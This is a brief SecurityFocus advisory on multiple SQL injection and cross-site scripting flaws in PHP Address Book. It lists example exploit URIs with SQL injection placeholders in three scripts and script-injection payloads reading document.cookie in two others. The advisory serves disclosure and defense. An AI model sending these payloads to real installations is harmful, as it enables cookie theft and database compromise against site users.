PHP Address Book Multiple SQL Injection and Multiple Cross Site Scripting Vulnerabilities

Attackers can use a browser to exploit the SQL-injection issues. An attacker must trick a victim into following a malicious URI to exploit a cross-site scripting issue.

The following example URIs are available:

http://www.example.com/addressbook/edit.php?id=[sql-injection]
http://www.example.com/addressbook/group.php?add=Add to&group=1&selected%5b%5d=132&to_group=[sql-injection]
http://www.example.com/addressbook/vcard.php?id=[sql-injection]

http://www.example.com/addressbook/preferences.php?from='"</script><script>alert(document.cookie)</script>
http://www.example.com/addressbook/index.php?group='"</script><script>alert(document.cookie)</script>


 

Privacy Statement
Copyright 2010, SecurityFocus